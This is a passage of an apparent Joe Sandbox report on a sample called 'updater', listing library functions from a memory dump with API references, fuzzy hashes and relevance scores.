Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 772191587174cca5aef57992a1d0556550c7fcb98b63a3e8f5ce5bed67535526
Instruction ID: d89c04c665d451b206d952a9dc39258779252ccf0ffee7f0f349878cb8829893
Opcode Fuzzy Hash: 772191587174cca5aef57992a1d0556550c7fcb98b63a3e8f5ce5bed67535526
Instruction Fuzzy Hash: 4FF08C34501229FBEB219BA5ED09F9E7E78EB00756F240165F900A22B0CBB0CB41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0143E2A6 Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0143E562,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0143E349
__alloca_probe_16.LIBCMT ref: 0143E3FF
__alloca_probe_16.LIBCMT ref: 0143E495
__freea.LIBCMT ref: 0143E500
__freea.LIBCMT ref: 0143E50C

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 9f6e274c1428ecc04d9f4d7c948a7911ae5ec78935e2629e71932a6e9bcee369
Instruction ID: 990cd9088d1f8affc8b7820a14fb65868d2720dea6f1c8c8e445b8a1c1c0cd20
Opcode Fuzzy Hash: 9f6e274c1428ecc04d9f4d7c948a7911ae5ec78935e2629e71932a6e9bcee369
Instruction Fuzzy Hash: 8981B9719022169BEF219EA9C840EEF7FB59FAD214F18006BEA15B73B1E631D941C760

Uniqueness

Uniqueness Score: -1.00%

Function 0142E9B6 Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 0143255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0143838D,00000220,?,?,?,?,?,?,01423E8D,?), ref: 0143258E

_free.LIBCMT ref: 0142EAC5
_free.LIBCMT ref: 0142EADC
_free.LIBCMT ref: 0142EAF9
_free.LIBCMT ref: 0142EB14
_free.LIBCMT ref: 0142EB2B

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 01dd7c867de21f706a46153fd0fc1cc341027d6af54d6cac2fb82a3f071f2990
Instruction ID: 306aedb729f29a43259331dd8ebbf96f8dfeaf82ac919fcbf125f429a14d136e
Opcode Fuzzy Hash: 01dd7c867de21f706a46153fd0fc1cc341027d6af54d6cac2fb82a3f071f2990
Instruction Fuzzy Hash: 0851C431A00215AFDB21DF6EC841A6ABBF4FF58720F54056EE50AE7260E771EA418B50

Uniqueness

Uniqueness Score: -1.00%

Function 0141CCC7 Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0141CD10
__alloca_probe_16.LIBCMT ref: 0141CD3C
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0141CD7B
__alloca_probe_16.LIBCMT ref: 0141CDEF
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0141CE50

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16
String ID:
API String ID: 2135360126-0
Opcode ID: 695400f3bd69898861a911df6f23e11b20a362fba9fe2f8112fdea2be4cf383b
Instruction ID: 598e1504790ce800fb5aabd1d9dafc3089eac73bab60bc845622a2c0403731b1
Opcode Fuzzy Hash: 695400f3bd69898861a911df6f23e11b20a362fba9fe2f8112fdea2be4cf383b
Instruction Fuzzy Hash: 3A51E472940316ABEF205F59CC84FAF7FA9EF50A64F15442AEE05A7278E730D911CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013E337C Relevance: 7.6, APIs: 5, Instructions: 121filesleepCOMMON

Download Yara Rule

APIs

LockFile.KERNEL32 ref: 013E33CC
Sleep.KERNEL32(00000001), ref: 013E33DA
UnlockFile.KERNEL32 ref: 013E3423
LockFile.KERNEL32 ref: 013E3457
LockFile.KERNEL32 ref: 013E3492

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: File$Lock$SleepUnlock
String ID:
API String ID: 1216273398-0
Opcode ID: 9a64094a112b91956652820a12d1d3c81b438a4094011135bd1128301d3d2cf6
Instruction ID: 68df7ed4c8dfbe7d1fb2c8cea3e3e7e3c526a492729e656ee26cdfa8c3ee44b7
Opcode Fuzzy Hash: 9a64094a112b91956652820a12d1d3c81b438a4094011135bd1128301d3d2cf6
Instruction Fuzzy Hash: B931D479741735BBEB334A199C89BAA7AD0BB40B69F118125FE057B2C0D771D941CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0140B5E6 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 0140B606
_Maklocstr.LIBCPMT ref: 0140B623
_Maklocstr.LIBCPMT ref: 0140B640
_Maklocchr.LIBCPMT ref: 0140B652
_Maklocchr.LIBCPMT ref: 0140B665

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Maklocstr$Maklocchr
String ID:
API String ID: 2020259771-0
Opcode ID: 1f0486dd892c06c4c839acb02575663edfa94253e3df721252aaf3ab45083ef9
Instruction ID: 2569046b57297f135739bbdbfe91d1f3cd8d494847b26f46e007c65da662c0d3
Opcode Fuzzy Hash: 1f0486dd892c06c4c839acb02575663edfa94253e3df721252aaf3ab45083ef9
Instruction Fuzzy Hash: C3118FB69007457FE3219BA68880F13B7ECEF15610F04492AF2458BAA0D375FD5087A9

Uniqueness

Uniqueness Score: -1.00%

Function 0140C1C8 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C1D9
int.LIBCPMT ref: 0140C1F0

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 0140C22A
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C24A
Concurrency::cancel_current_task.LIBCPMT ref: 0140C257

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 952d4d44809c24a6668fe09e295ccfcee8df336c7cac2035325f6a5151da1902
Instruction ID: 3cbb0d809f9bbc609e2c4ce2e252f652e4414db4287166004357ecda726acf58
Opcode Fuzzy Hash: 952d4d44809c24a6668fe09e295ccfcee8df336c7cac2035325f6a5151da1902
Instruction Fuzzy Hash: 7C01C475D0011ACBCB06EBA98854ABE7764BFA4B24F18425ED815673F0CF749A05C781

Uniqueness

Uniqueness Score: -1.00%

Function 0140C387 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C398
int.LIBCPMT ref: 0140C3AF

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 0140C3E9
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C409
Concurrency::cancel_current_task.LIBCPMT ref: 0140C416

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 14e4bf97042d2f7b2e8eff3bef4e433c1e1173411ae098dfd08f005997fb5568
Instruction ID: 69856e06b9f3a65ff0b9079bdee3474ea8e5be2925f8dcfe0cb260d9f36d7855
Opcode Fuzzy Hash: 14e4bf97042d2f7b2e8eff3bef4e433c1e1173411ae098dfd08f005997fb5568
Instruction Fuzzy Hash: BE01C475D00116DBCB16EB698844AFEB761BFA0614F29416EE8126B2F0CF749A06D781

Uniqueness

Uniqueness Score: -1.00%

Function 0140C25D Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C26E
int.LIBCPMT ref: 0140C285

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 0140C2BF
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C2DF
Concurrency::cancel_current_task.LIBCPMT ref: 0140C2EC

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: b4ab73f05b6cc748c9e99fed6d12ab73ea4f680816f669d4ac5aaf02d3c996e5
Instruction ID: 39606d0cb0a8c58e040f8e5867b60699ef83e949b2411596f6092cc59529b6a0
Opcode Fuzzy Hash: b4ab73f05b6cc748c9e99fed6d12ab73ea4f680816f669d4ac5aaf02d3c996e5
Instruction Fuzzy Hash: 5601C036D00116DBDB06EBAA8844ABEBB65BFA0624F18415ED8056B6F0CF349E05DB81

Uniqueness

Uniqueness Score: -1.00%

Function 0140C2F2 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C303
int.LIBCPMT ref: 0140C31A

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 0140C354
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C374
Concurrency::cancel_current_task.LIBCPMT ref: 0140C381

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: a646c2077a95016f068c12a3d80e7f384bf5f8336d2655a1080ee661b4bdb482
Instruction ID: bb0a4baff6381b4a33ca0c799859331d48ee3690770fd218f2f3c7c47d68dc4d
Opcode Fuzzy Hash: a646c2077a95016f068c12a3d80e7f384bf5f8336d2655a1080ee661b4bdb482
Instruction Fuzzy Hash: EE01C475900116DBCB16EB6A8854ABEB7B4BFA4714F18425ED805673F0CF349A06C781

Uniqueness

Uniqueness Score: -1.00%

Function 0140C705 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C716
int.LIBCPMT ref: 0140C72D

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 0140C767
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C787
Concurrency::cancel_current_task.LIBCPMT ref: 0140C794

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 137f08950a4a96676d119e643778c6218265c1b440027ca7ba3da15d23c318aa
Instruction ID: 6ad0609af34f6ecc583557963e03de8bcd116a446d0edce6fb55ad16e0134d75
Opcode Fuzzy Hash: 137f08950a4a96676d119e643778c6218265c1b440027ca7ba3da15d23c318aa
Instruction Fuzzy Hash: 20010035900117DBCB06EB6A8850AAEBB64BFA0624F28415FD900672F0CF749A05C781

Uniqueness

Uniqueness Score: -1.00%

Function 0140C79A Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C7AB
int.LIBCPMT ref: 0140C7C2

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 0140C7FC
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C81C
Concurrency::cancel_current_task.LIBCPMT ref: 0140C829

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 0697ee1447ff4fb5b84a4a20f416fe25c09326f66fe23c6c569af89a0b6cb857
Instruction ID: 3e52557d25cfdfaae9e242133fa6d67be18789f73f172ecdd723bd056da988c7
Opcode Fuzzy Hash: 0697ee1447ff4fb5b84a4a20f416fe25c09326f66fe23c6c569af89a0b6cb857
Instruction Fuzzy Hash: 1101047A900116CBCB06EB69C854ABEB774BFA4728F18455ED8156B2F1CF348E01C781

Uniqueness

Uniqueness Score: -1.00%

Function 0140C670 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C681
int.LIBCPMT ref: 0140C698

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 0140C6D2
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C6F2
Concurrency::cancel_current_task.LIBCPMT ref: 0140C6FF

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 612c562c74ab552d9220729aca904ca058bbe5c399d6bf55e6ad16842c96771d
Instruction ID: 75c5f2b46f505a58b4662c3b8e8e56c3583cef7f71ea9f658b60c10df81df0e7
Opcode Fuzzy Hash: 612c562c74ab552d9220729aca904ca058bbe5c399d6bf55e6ad16842c96771d
Instruction Fuzzy Hash: 3501A175900116DBDB16EB69C844AAEBB71BF60614F18455FD805AB2E0CF349E05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0140C9EE Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C9FF
int.LIBCPMT ref: 0140CA16

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 0140CA50
std::_Lockit::~_Lockit.LIBCPMT ref: 0140CA70
Concurrency::cancel_current_task.LIBCPMT ref: 0140CA7D

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 22df7d2154c1d0c10110f39110d8b9e15573a02b4d3277959015f249ab285c56
Instruction ID: 0d2c4aa6d33b52adc6b8936d8e42c0088a9aa3709b5eb544472c3763e555e9fd
Opcode Fuzzy Hash: 22df7d2154c1d0c10110f39110d8b9e15573a02b4d3277959015f249ab285c56
Instruction Fuzzy Hash: E701C075D00116CBDB06EB69C854BBEBB60BFA0B24F29465EE811672F0CF749A41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0140C82F Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C840
int.LIBCPMT ref: 0140C857

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 0140C891
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C8B1
Concurrency::cancel_current_task.LIBCPMT ref: 0140C8BE

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 4f084293fab9cc561f76dd32ec7c8d58206d4baeb0f7c3b35063992614ed4a24
Instruction ID: 64e161e45c383431de8716fdf0686f0045f32ba6940c46a3f2d61bd320e0d8b5
Opcode Fuzzy Hash: 4f084293fab9cc561f76dd32ec7c8d58206d4baeb0f7c3b35063992614ed4a24
Instruction Fuzzy Hash: F8010436D00116CFDB06AB6AC840ABEB761BFA0624F18415FD8006B3F0CF749E01DB81

Uniqueness

Uniqueness Score: -1.00%

Function 0140CB18 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140CB29
int.LIBCPMT ref: 0140CB40

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 0140CB7A
std::_Lockit::~_Lockit.LIBCPMT ref: 0140CB9A
Concurrency::cancel_current_task.LIBCPMT ref: 0140CBA7

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: ce5850e187aa69e91d622b0746992990065b34cfa52a94fb0a98088cac25c715
Instruction ID: 0e7cbdc541c22a85b4ea4f95ad5781f55fbca20f95add20aad5be0fb2c138d19
Opcode Fuzzy Hash: ce5850e187aa69e91d622b0746992990065b34cfa52a94fb0a98088cac25c715
Instruction Fuzzy Hash: AB010075900216CBDB06AB69D840ABEBBB1BFA0724F18015ED804672F0CF749A01D781

Uniqueness

Uniqueness Score: -1.00%

Function 0140CBAD Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140CBBE
int.LIBCPMT ref: 0140CBD5

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 0140CC0F
std::_Lockit::~_Lockit.LIBCPMT ref: 0140CC2F
Concurrency::cancel_current_task.LIBCPMT ref: 0140CC3C

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: d83aff2ccbc379a37722a2911d3c44c7e662b4bdb6cbf0ccd100e64efdd1bc17
Instruction ID: ae7edfe028967fea5b12fe0c1481f1a8bf172d622e0abade5e55ff7546c93c59
Opcode Fuzzy Hash: d83aff2ccbc379a37722a2911d3c44c7e662b4bdb6cbf0ccd100e64efdd1bc17
Instruction Fuzzy Hash: 4E012235900216CBDB06EB69C850ABEBB70BFA0724F18465EE801673F0CF348E02C781

Uniqueness

Uniqueness Score: -1.00%

Function 0140CA83 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140CA94
int.LIBCPMT ref: 0140CAAB

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
